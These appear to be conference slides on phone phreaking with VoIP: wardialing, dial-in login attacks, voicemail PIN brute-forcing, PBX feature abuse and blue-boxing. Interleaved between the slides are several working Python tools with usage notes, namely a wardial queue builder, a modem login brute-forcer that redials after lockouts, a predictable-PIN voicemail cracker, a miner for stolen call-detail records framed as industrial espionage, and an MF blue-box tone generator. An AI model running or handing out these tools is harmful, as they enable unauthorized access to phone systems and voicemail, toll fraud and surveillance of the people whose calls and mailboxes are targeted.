Phree as in Phone Call

The other end of the line

FILE_ID.DIZ

- Advantages of phreaking with VoIP
- Modern dialing setup
- Modern wardialing and scanning techniques
  - Identifying and classifying devices
- Hacking dial-in lines
  - System types and login attacks
- IVR and voicemail systems
  - PIN brute-forcing
- PaBXs
  - Exploiting features

Advantages of phreaking with VoIP

- International destinations much more accessible
  - VoIP is cheap
  - Can scam free VoIP
- Don't need to scan from home any more
  - Fewer knocks at the door
- Parallelization
  - Can run savage burns
- Easier to perform certain attacks
  - CallerID spoofing
  - Automates hand scanning

Modems and VoIP

- Most people think it can't be done
  - Complex codecs cause havoc to connections
  - Modems can't connect
  - Connections drop
- It can be done!


What you need

- VoIP account
  - Lots of cheap providers: voipjet.com, voipbuster.com
  - Trial accounts
  - Free calls
- Asterisk server
  - Routing
  - Call recording
  - CallerID spoofing

Device configuration tricks

- ATA
  - Compression disabled (G.711 ulaw!)
  - No echo cancellation (*99 on PAP2)
- Modem
  - Disable local flow control
  - Disable error correction
  - Disable data compression
What can you connect to?

 Modems all over the world

Control systems

SCADA systems

Alarm systems

Alarm systems

 International x.25 networks

India, Africa, Russia, China…

Banking

 Other interesting stuff

Obscure devices and networks

Obscure devices and networks

Bulletin boards (yep!)

(11)

What can you connect to?

(12)

Wardialing

- Automatically dialing numbers to find modems
  - Target identification
  - Inventory building
- Risks
  - Time of day
  - Randomize numbers!
- Modern wardialing
  - Use VoIP, UNIX and Asterisk
  - The Intelligent Wardialer (iWar)

Wardialing

- iWar
  - Multiple modems are no problem!
  - Serial-to-USB adapters
  - Scalable banks of modems with limitless potential
  - Remote system identification (126 banners)
  - MySQL support
  - CNAM lookup feature

Wardialing

- What will we find?
  - Routers
  - Remote access servers
  - PPP dial-ins
  - PC Anywhere
  - PaBX management systems
  - IVR systems
  - Network backdoors
  - Outdials
  - Diverters (dialtones)

Wardialing

- Reducing time with blacklists
  - Internal / employee directories
  - DDIs and other numbers harvested from websites
  - Business directories
  - Websites
  - CD-ROMs
  - Fax directories
  - Do-not-call lists
  - Special ranges
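The wardialing slides above (randomize the dial order, mind the time of day, work ranges such as (09) 3XXXXXX, and blacklist numbers you already know) as one worked example. This is added code, not iWar or THC-Scan; the blacklist file format, the sample entries and the calling-window check are constructed for the example.

```python
"""Build a randomized wardial queue: expand a range mask such as '(09) 3XXXXXX',
drop numbers already known (harvested DDIs, fax lines, do-not-call entries) and
shuffle so the dialer never walks a block in order. Added example, not iWar."""
import itertools
import random
import re


def normalize(number):
    """Keep digits and X wildcards only: '(09) 3XX-XXXX' -> '093XXXXXX'."""
    return re.sub(r"[^0-9Xx]", "", number).upper()


def expand_mask(mask):
    """Yield every number matching the mask; each X stands for one digit 0-9."""
    mask = normalize(mask)
    for fill in itertools.product("0123456789", repeat=mask.count("X")):
        digits = iter(fill)
        yield "".join(next(digits) if ch == "X" else ch for ch in mask)


def load_blacklist(lines):
    """Numbers to skip, one per line, '#' starting a comment (constructed format).
    Entries are normalized like the mask, so '(09) 340-1234' and '093401234'
    compare equal whatever directory or website they were scraped from."""
    skip = set()
    for line in lines:
        entry = line.split("#", 1)[0].strip()
        if entry:
            skip.add(normalize(entry))
    return skip


def build_queue(mask, blacklist, seed=None):
    """Targets in random order; a fixed seed makes a scan reproducible/resumable."""
    targets = [n for n in expand_mask(mask) if n not in blacklist]
    random.Random(seed).shuffle(targets)
    return targets


def in_window(now, start, end):
    """True if 'now' (HH:MM, 24h) lies in the permitted calling window; the
    window may cross midnight, e.g. start='22:00', end='06:00'."""
    if start <= end:
        return start <= now < end
    return now >= start or now < end


# Constructed blacklist: two harvested DDIs (reception and fax) and a comment.
SAMPLE_BLACKLIST = load_blacklist([
    "(09) 340-1234   # reception number, from the website",
    "09 3401235      # fax, from the fax directory",
    "# 09 3401236 is commented out and therefore still dialed",
])

if __name__ == "__main__":
    queue = build_queue("(09) 3401XXX", SAMPLE_BLACKLIST, seed=7)
    print(len(queue), "targets; first five:", queue[:5])
    print("dial now?", in_window("10:00", "09:00", "17:00"))
```

Feed the queue to whatever does the dialing (an Asterisk call file per number, or a serial modem), and have the scheduler consult `in_window` before each call so a scan that runs for days stays inside the hours you chose for that range.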

Wardialing

- Published research
  - Peter Shipley dialed 5.7M numbers over three years
  - 50,000 carriers found
- Found unauthenticated access to:
  - Fire Department's dispatch system
  - Control system for a high-voltage power transmission line
  - Internal networks of financial organizations
  - A leased-line control system
  - Credit card number databases

Wardialing

- THC-Scan: Next Generation
  - Distributed wardialer!
  - Large modem pools
  - Large scan ranges, e.g. (09) 3XXXXXX
  - Global scanning efforts

Wardialing

- Callus-free handscanning
  - iWar with IAX2 connection
  - Wifi at a café, etc.
  - Headphones
  - Time and patience
- Upsides
  - Safe and anonymous
  - Mostly automated
  - Handsfree!

Hacking dial-in lines

- Figuring out what you're dealing with
  - System types and banners
  - Identifying different login prompts and methods
  - Building username and password lists
  - Google for defaults
- Login brute-forcing
  - Tools

Hacking dial-in lines

- Different login prompts and methods
  - Single auth
  - Dual auth
  - Limited or unlimited attempts?

Login brute forcing

- Tools
  - Commercial war dialers (lame)
  - Modem Login Hacker for Linux
  - X.25 NUI/NUA scanners
- Homebrew
  - Minicom runscript
  - Python serial library

Login brute forcing

- Modem Login Hacker
  - Works against any 'Username:' or 'Login:' variation
  - Unix, Cisco, PaBXs
  - Customizable for different login formats
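The "homebrew with the Python serial library" route from the slides above, as one worked example covering the modem configuration tricks, prompt identification (single versus dual auth, limited attempts) and the brute-force loop. This is added code, not the page's Modem Login Hacker. The AT commands are the Conexant/Rockwell-style set (an assumption; check your modem's manual, US Robotics uses different ones), and `FakeModem` is a constructed stand-in for a pyserial `Serial` object so the script runs offline.

```python
"""Dial-in login attack, end to end: put the modem in the VoIP-friendly data
mode from the slides, dial, fingerprint the banner, then work a credential list
against a 'Username:'/'Login:' (dual auth) or 'Password:' (single auth) prompt,
redialing when the far end drops carrier after its attempt limit. Added
example. AT commands follow the Conexant/Rockwell-style set (assumption).
FakeModem is a constructed stand-in for pyserial's Serial; for a real port use
serial.Serial("/dev/ttyUSB0", 115200, timeout=2) in its place."""
import re

INIT = ["ATZ",       # reset to the stored profile
        "AT&K0",     # no local (DTE-DCE) flow control
        "AT\\N0",    # 'normal' mode: no error correction (V.42/MNP off)
        "AT%C0"]     # no data compression (V.42bis/MNP5 off)
PROMPTS = [("USER", re.compile(r"(user ?name|login)\s*:$", re.I)),
           ("PASS", re.compile(r"password\s*:$", re.I)),
           ("SHELL", re.compile(r"[>#$]$"))]
FINGERPRINTS = [("cisco-ios", re.compile(r"User Access Verification")),
                ("unix-getty", re.compile(r"\S+ login:", re.I))]


def fingerprint(banner):
    return next((n for n, rx in FINGERPRINTS if rx.search(banner)), "unknown")


def read_until(port, max_reads=20):
    """Read until the text ends in a known prompt or carrier drops. With
    pyserial each read(4096) blocks for at most the port timeout."""
    text = ""
    for _ in range(max_reads):
        text += port.read(4096).decode(errors="replace")
        if "NO CARRIER" in text:
            return text, "DROP"
        for state, rx in PROMPTS:
            if rx.search(text.rstrip()):
                return text, state
    return text, "TIMEOUT"


def send(port, line):
    port.write((line + "\r").encode())
    return read_until(port)


def init_modem(port):
    for cmd in INIT:
        port.write((cmd + "\r").encode())
        if "OK" not in port.read(4096).decode(errors="replace"):
            raise RuntimeError("modem rejected " + cmd)


def brute_force(port, number, users, passwords):
    todo = [(u, p) for u in users for p in passwords]
    stats = {"attempts": 0, "calls": 0, "found": None, "system": None}
    while todo and stats["found"] is None:
        banner, state = send(port, "ATDT" + number)
        stats["calls"] += 1
        stats["system"] = stats["system"] or fingerprint(banner)
        if state == "PASS":                      # single auth: passwords only
            todo = list(dict.fromkeys((None, p) for _, p in todo))
        elif state != "USER":
            raise RuntimeError("no login prompt after dialing: %r" % banner)
        while todo:
            user, pw = todo[0]
            if user is not None and send(port, user)[1] != "PASS":
                break                            # unexpected prompt: redial
            _, state = send(port, pw)
            stats["attempts"] += 1
            if state == "SHELL":
                stats["found"] = (user, pw)
                break
            todo.pop(0)                          # tried; never repeat it
            if state not in ("USER", "PASS"):
                break                            # carrier dropped: redial
    return stats


class FakeModem:
    """Constructed: answers AT commands with OK; behind ATDT emulates a
    Cisco-style dial-in that drops carrier after max_tries bad logins."""
    def __init__(self, creds, max_tries=3):
        self.creds, self.max_tries = creds, max_tries
        self.buf, self.online, self.tries, self.user = b"", False, 0, None

    def write(self, data):
        line = data.decode().strip()
        if not self.online:
            if line.upper().startswith("ATDT"):
                self.online, self.tries, self.user = True, 0, None
                self.buf += b"CONNECT 9600\r\n\r\nUser Access Verification\r\n\r\nUsername: "
            elif line.upper().startswith("AT"):
                self.buf += b"OK\r\n"
        elif self.user is None:
            self.user, self.buf = line, self.buf + b"Password: "
        elif (self.user, line) == self.creds:
            self.buf += b"\r\nrouter>"
        else:
            self.user, self.tries = None, self.tries + 1
            if self.tries >= self.max_tries:
                self.online, self.buf = False, self.buf + b"\r\nNO CARRIER\r\n"
            else:
                self.buf += b"\r\n% Login invalid\r\n\r\nUsername: "

    def read(self, n=4096):
        out, self.buf = self.buf[:n], self.buf[n:]
        return out
```

Run it as `init_modem(m); brute_force(m, "093401234", ["admin"], wordlist)` with `m = FakeModem(("admin", "cisco"))` to see the redial after three failures; against a real line the same loop simply takes longer, and the `system` field tells you which default-credential list to try first.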

IVRs and voicemail

- Fingerprinting voicemail systems
  - Default prompts
  - Default mailbox numbers and PINs
  - Admin mailbox
  - "Nudges" (*8, *81, *, #, 0)
  - Can you find the admin console?
- CallerID spoofing attacks
  - ANI or CID authentication is very bad!
- Call forwarding and out-dials

IVRs and voicemail

- Launching a PIN brute force attack
- Things to figure out
  - Dial-in numbers and PIN length
  - Numbering format for mailboxes

PIN brute forcing

- Metlstorm's mighty Hai2IVR
  - SIP client for brute forcing DTMF prompts
  - Can record calls and scan in parallel
  - GUI for sorting and listening to the results

PIN brute forcing

- Components
  - Hai2IVR GTK interface
    - Handles the parallelization
    - GUI for reviewing results
  - metlodtmfzor
    - Makes the calls and sends the DTMF
    - Command line scriptable
- Hai2IVR setup
  - Route through Asterisk
  - Authenticated SIP

Predictable PINs

- Keypad patterns
  - Making shapes: L, X, O
  - Repeating numbers: 2244, 9988
  - Patterns
- Other lists
  - Birth dates
  - Pop culture references: 1984, 1337 (WiteRabit's PIN)
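The PIN brute-force slides above (PIN length and mailbox numbering format, parallel channels, predictable PINs: keypad shapes, repeats, birth dates, 1984 and 1337) as one worked example. This is added code, not Hai2IVR or metlodtmfzor: it orders the candidate list so the predictable PINs are dialled first and deals the jobs out across parallel callers. The keypad paths, the 1940 to 2009 birth-year range and the mailbox format are assumptions made for the example.

```python
"""Order an n-digit voicemail PIN search so predictable PINs are tried first
(keypad shapes, repeated digits, sequences, birth years, the talk's pop-culture
numbers), then everything else, and deal the jobs out to parallel channels.
Added example; not Hai2IVR's or metlodtmfzor's own ordering."""
import itertools

# Paths traced on a phone keypad (1-2-3 / 4-5-6 / 7-8-9 / 0 under 8); an
# n-digit window along a path, forwards or backwards, is a 'shape' PIN.
SHAPES = [
    "123", "456", "789",                  # rows
    "147", "2580", "369",                 # columns
    "159", "357",                         # diagonals
    "14789", "36987", "74123", "96321",   # L shapes
    "159357", "357159",                   # X drawn as two strokes
    "123698741236",                       # O around the 5 key, repeated so windows wrap
]
POP_CULTURE = ["1984", "1337"]            # from the talk (1337: WiteRabit's PIN)
BIRTH_YEARS = range(1940, 2010)           # assumed plausible range
DIGITS = "0123456789"


def windows(path, n):
    """All n-digit slices of a path and their reversals."""
    fwd = [path[i:i + n] for i in range(len(path) - n + 1)]
    return fwd + [w[::-1] for w in fwd]


def predictable(n=4):
    """Priority candidates of length n, de-duplicated, most predictable first."""
    cands = [d * n for d in DIGITS]                                   # 1111, 2222
    cands += windows("01234567890", n)                                # 1234, 4321
    if n % 2 == 0:                                                    # 2244, 9988
        halves = map("".join, itertools.product(DIGITS, repeat=n // 2))
        cands += ["".join(c * 2 for c in half) for half in halves]
    for path in SHAPES:
        cands += windows(path, n)
    cands += [str(y) for y in BIRTH_YEARS if len(str(y)) == n]
    cands += [p for p in POP_CULTURE if len(p) == n]
    return list(dict.fromkeys(c for c in cands if len(c) == n))


def ordered(n=4):
    """Every n-digit PIN: the predictable ones first, the rest in numeric order."""
    allpins = ("".join(t) for t in itertools.product(DIGITS, repeat=n))
    return list(dict.fromkeys(predictable(n) + list(allpins)))


def mailboxes(start, end, width=3):
    """Mailbox numbers in the system's numbering format, zero-padded to width
    (assumed: extensions double as mailbox numbers)."""
    return [f"{m:0{width}d}" for m in range(start, end + 1)]


def deal(items, channels):
    """Round-robin split so each parallel caller gets an equal share."""
    return [items[i::channels] for i in range(channels)]


if __name__ == "__main__":
    pins = ordered(4)
    print(len(predictable(4)), "predictable PINs go first, e.g.", pins[:12])
    jobs = [(box, pin) for box in mailboxes(200, 203) for pin in pins]
    print(len(jobs), "jobs over 4 channels:", [len(c) for c in deal(jobs, 4)])
```

With a few hundred predictable PINs up front, a mailbox that uses one of them falls in the first minutes of a scan rather than somewhere in the 10,000-call sweep; the remainder of the list is still complete, so nothing is skipped if the ordering guess is wrong.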

Predictable PINs

- PINPop.com
  - Research project into predictable PINs
  - PIN database analysis
- Goals
  - Secure PIN selection patches to Asterisk

PaBX hacking

- Attack categories
  - Theft of service
  - Routing manipulation
  - Traffic analysis (stealing CDRs)
  - Social engineering

PaBX hacking

- The Holy Grail
  - Access to the maintenance console
  - Dial-in lines, extensions, computers
- Feature exploits
  - Conferencing
  - Three-way calling
  - Call forwarding
  - Direct Inward System Access (DISA)
  - Test features that remotely activate mics
- Theft of CDRs
  - Industrial espionage
  - Advanced auditing

PaBX hacking

- A hacked Meridian management console can:
  - Set up trunks to allow outgoing calls
  - Manipulate trunks
  - Re-route incoming / outgoing calls
  - Eavesdrop on extensions
  - Set a Meridian Mail box to auto-logon temporarily
  - Shut down the PaBX
  - Make phones ring infinitely
  - Trace calls through CDR records

PaBX hacking

- Lockdown methods
  - Restricted out-dialing
  - Forwarding features disabled
  - Enforced minimum PIN size
  - Unused boxes deactivated
  - Lockout counters with manual reset
  - Timeouts on setup of new mailboxes
  - Challenge-response systems
  - US Government classified VMSs need SecurIDs

PaBX hacking

- CDRs and datamining
  - Sensitive information can be gleaned from call records
  - Who called whom and when
  - Current and potential clients, contractors
  - Recent company activities
- AMDOCS example
  - Handles billing for most American telcos
  - FBI and NSA investigation into sending CDRs offshore
  - Possibility of Israelis spying on Americans through CDRs
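What "who called whom and when" looks like once someone has the CDRs, as an added example (not from the talk): it parses records in Asterisk's Master.csv column order and pulls out the outside numbers an organisation talks to, through which extensions, how often and since when. The five records are constructed; the numbers, names and the rule that extensions are at most four digits are assumptions for the example.

```python
"""Mine call detail records (CDRs) for who called whom and when: the outside
numbers an organisation talks to, how often, through which extensions, and
when contact began. Added example, not from the talk. The rows are constructed
in Asterisk's Master.csv column order; numbers and names are made up."""
import csv
from collections import defaultdict
from io import StringIO

FIELDS = ["accountcode", "src", "dst", "dcontext", "clid", "channel", "dstchannel",
          "lastapp", "lastdata", "start", "answer", "end", "duration", "billsec",
          "disposition", "amaflags", "uniqueid", "userfield"]

# Constructed sample: 201 talks to 6495551000 twice (once inbound), 203 fails
# to reach 6495552000 and 201 then reaches it, plus one internal call 201->202.
SAMPLE_CDR = """\
"","201","6495551000","from-internal","Sales <201>","SIP/201-1","SIP/trunk-2","Dial","SIP/trunk/6495551000","2007-11-17 09:02:11","2007-11-17 09:02:20","2007-11-17 09:31:44",1773,1764,"ANSWERED","DOCUMENTATION","1195261331.1",""
"","6495551000","201","from-trunk","6495551000","SIP/trunk-3","SIP/201-4","Dial","SIP/201","2007-11-18 14:00:00","2007-11-18 14:00:05","2007-11-18 14:05:05",305,300,"ANSWERED","DOCUMENTATION","1195365600.3",""
"","203","6495552000","from-internal","Support <203>","SIP/203-5","SIP/trunk-6","Dial","SIP/trunk/6495552000","2007-11-18 16:20:00","","2007-11-18 16:20:30",30,0,"NO ANSWER","DOCUMENTATION","1195374000.5",""
"","201","6495552000","from-internal","Sales <201>","SIP/201-7","SIP/trunk-8","Dial","SIP/trunk/6495552000","2007-11-19 10:00:00","2007-11-19 10:00:04","2007-11-19 10:02:04",124,120,"ANSWERED","DOCUMENTATION","1195437600.7",""
"","201","202","from-internal","Sales <201>","SIP/201-9","SIP/202-10","Dial","SIP/202","2007-11-19 11:00:00","2007-11-19 11:00:02","2007-11-19 11:03:02",182,180,"ANSWERED","DOCUMENTATION","1195441200.9",""
"""


def parse_cdr(text):
    return [dict(zip(FIELDS, row)) for row in csv.reader(StringIO(text)) if row]


def is_internal(number, max_ext_len=4):
    """Assumption: extensions are short; anything longer is an outside number."""
    return number.isdigit() and len(number) <= max_ext_len


def contact_summary(records):
    """Per outside number: attempts, answered calls, talk minutes, first/last
    contact and the extensions involved, counting both call directions."""
    blank = lambda: {"attempts": 0, "answered": 0, "minutes": 0.0,
                     "first": None, "last": None, "extensions": set()}
    summary = defaultdict(blank)
    for r in records:
        if is_internal(r["src"]):
            ext, outside = r["src"], r["dst"]
        else:
            ext, outside = r["dst"], r["src"]
        if is_internal(outside) or not is_internal(ext):
            continue                      # internal-only or trunk-to-trunk
        s = summary[outside]
        s["attempts"] += 1
        s["extensions"].add(ext)
        s["first"] = min(filter(None, [s["first"], r["start"]]))
        s["last"] = max(filter(None, [s["last"], r["start"]]))
        if r["disposition"] == "ANSWERED":
            s["answered"] += 1
            s["minutes"] += int(r["billsec"]) / 60
    return dict(summary)


def top_contacts(records, k=5):
    """Outside numbers ranked by talk time: the clients and contractors that
    make stolen CDRs worth having."""
    return sorted(contact_summary(records).items(),
                  key=lambda kv: kv[1]["minutes"], reverse=True)[:k]


if __name__ == "__main__":
    for number, s in top_contacts(parse_cdr(SAMPLE_CDR)):
        print(number, s["answered"], "answered,", round(s["minutes"], 1), "min,",
              "ext", sorted(s["extensions"]), "first", s["first"])
```

The same pass over a few months of records gives the "recent company activities" bullet for free: a new outside number that suddenly accounts for most of an executive's talk time is a deal, a lawsuit or a hire in progress, which is exactly why CDR theft belongs in the industrial-espionage category above.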

The infinite power of Asterisk

- Custom setups
  - Testing environment for tools
  - Anonymous voicemail servers
  - Encrypted voice
  - Private networks like DetoVoIP and Telephreak
  - Rogue PaBXs for eavesdropping
- Custom features
  - ProjectMF: A trip down phone-phreak memory lane
  - Asterisk patches to support MF in-band signaling
  - Lets you bluebox telephone calls

The infinite power of Asterisk

- Call the ProjectMF server
  - Get dropped to a C5 trunk
  - Hold the phone up to the speakers
  - Seize the trunk with a 1 second burst of 2600 Hz
  - Send KP + 12588 + ST in multi-frequency (MF) tones
  - Call connects
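The blue-box sequence the ProjectMF slides describe, as an added example (not ProjectMF's code): one second of 2600 Hz to seize the trunk, a pause, then KP, the digits and ST as MF tone pairs, written to an 8 kHz WAV you can play at the handset. The MF frequency pairs are the standard Bell System / R1 assignments; the 65 ms digit timing and the one-second settle after the seize are approximations chosen for the example, not values from the talk. A Goertzel check is included so you can confirm each segment carries the tones it should before trusting it on a trunk.

```python
"""Synthesize a blue-box call setup: 2600 Hz seize, pause, then KP + digits + ST
as MF tone pairs, as 8 kHz 16-bit mono PCM. Frequencies are the Bell/R1 MF
pairs; timings are approximations (assumed). Added example, not ProjectMF."""
import math
import struct
import wave

RATE = 8000
MF = {
    "1": (700, 900),   "2": (700, 1100),  "3": (900, 1100),
    "4": (700, 1300),  "5": (900, 1300),  "6": (1100, 1300),
    "7": (700, 1500),  "8": (900, 1500),  "9": (1100, 1500),
    "0": (1300, 1500), "KP": (1100, 1700), "ST": (1500, 1700),
}


def tone(freqs, ms, amp=0.4):
    """Sum of sines at the given frequencies, ms long, peak amplitude amp."""
    n = int(RATE * ms / 1000)
    return [amp / len(freqs) * sum(math.sin(2 * math.pi * f * i / RATE) for f in freqs)
            for i in range(n)]


def silence(ms):
    return [0.0] * int(RATE * ms / 1000)


def bluebox(digits, seize_ms=1000, settle_ms=1000, kp_ms=100, digit_ms=65, gap_ms=65):
    """Labelled segments: ('2600', ...), ('settle', ...), ('KP', ...), digits, ('ST', ...),
    each tone followed by a ('gap', ...) of silence."""
    segs = [("2600", tone((2600,), seize_ms)), ("settle", silence(settle_ms))]
    for sym in ["KP", *digits, "ST"]:
        segs.append((sym, tone(MF[sym], kp_ms if sym == "KP" else digit_ms)))
        segs.append(("gap", silence(gap_ms)))
    return segs


def flatten(segments):
    return [x for _, seg in segments for x in seg]


def goertzel(samples, freq):
    """Power at 'freq' in 'samples' (Goertzel algorithm), used to verify output."""
    coeff = 2 * math.cos(2 * math.pi * freq / RATE)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def dominant(samples, candidates=(700, 900, 1100, 1300, 1500, 1700, 2600)):
    """The two strongest candidate frequencies in a segment, ascending."""
    ranked = sorted(candidates, key=lambda f: goertzel(samples, f), reverse=True)
    return tuple(sorted(ranked[:2]))


def write_wav(path, segments):
    """Write the segments as one 16-bit mono WAV; returns the sample count."""
    pcm = flatten(segments)
    ints = [int(max(-1.0, min(1.0, x)) * 32767) for x in pcm]
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(RATE)
        w.writeframes(struct.pack("<%dh" % len(ints), *ints))
    return len(ints)


if __name__ == "__main__":
    segs = bluebox("12588")
    n = write_wav("bluebox_12588.wav", segs)
    print("wrote %d samples (%.2f s)" % (n, n / RATE))
    for label, seg in segs:
        if label not in ("gap", "settle"):
            print(label, dominant(seg))
```

Playing the file into the handset reproduces the slide's sequence; the `dominant` read-back is worth keeping because a cheap speaker or an aggressive VoIP codec will mangle the 1700 Hz component of KP and ST long before it touches the lower digit frequencies, and that is the first thing to check when the trunk does not answer.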

Thanks

- Thanks & greets to:
  - SA.com
  - SLi
  - Andrew Horton
  - Metlstorm
  - Detonate
  - Kiwicon crew
  - Beave
  - Jfalcon
  - M4phr1k

NO CARRIER

http://www.security-assessment.com

john@security-assessment.com
